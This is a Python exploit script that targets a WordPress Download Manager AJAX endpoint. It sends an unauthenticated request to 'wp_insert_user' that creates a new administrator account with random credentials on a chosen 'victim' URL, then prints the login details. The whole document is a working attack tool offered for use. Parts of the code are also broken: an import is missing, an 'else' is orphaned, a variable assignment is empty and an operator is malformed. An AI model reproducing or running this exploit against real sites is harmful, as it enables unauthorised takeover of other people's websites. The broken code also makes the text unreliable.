import urllib, urllib2, socket
import sys
import string, random
import optparse
def checkurl(url):
sys.exit( 1 )
else :
return url
def checkfile( file ):
if not os.path.isfile( file ) and not os.access( file , os.R_OK):
print '[X] ' + file + ' file is missing or not readable'
sys.exit( 1 )
else :
return file
def id_generator(size = 6 , chars = string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range (size))
banner =
commandList = optparse.OptionParser( 'usage: %prog -t URL [--timeout sec]' )
commandList.add_option( '-t' , '--target' , action = "store" ,
help = "Insert TARGET URL: http[s]://www.victim.com[:PORT]" ,
)
commandList.add_option( '--timeout' , action = "store" , default = 10 , type = "int" ,
help = "[Timeout Value] - Default 10" ,
)
options, remainder = commandList.parse_args()
if not options.target:
print (banner)
commandList.print_help()
sys.exit( 1 )
host = checkurl(options.target)
timeout = options.timeout
print (banner)
socket.setdefaulttimeout(timeout)
username = id_generator()
pwd = id_generator()
body = urllib.urlencode({ 'action' : 'wpdm_ajax_call' ,
'execute' : 'wp_insert_user' ,
'user_login' : username,
'user_pass' : pwd,
'role' : 'administrator' })
headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' }
print "[+] Tryng to connect to: " + host
try :
req = urllib2.Request(host + "/" , body, headers)
response = urllib2.urlopen(req)
html = response.read()
if html = = "":
print ( "[!] Account Added" )
print ( "[!] Location: " + host + "/wp-login.php" )
print ( "[!] Username: " + username)
print ( "[!] Password: " + pwd)
else :
print ( "[X] Exploitation Failed :(" )
except urllib2.HTTPError as e:
print ( "[X] " + str (e))
except urllib2.URLError as e:
print ( "[X] Connection Error: " + str (e))
|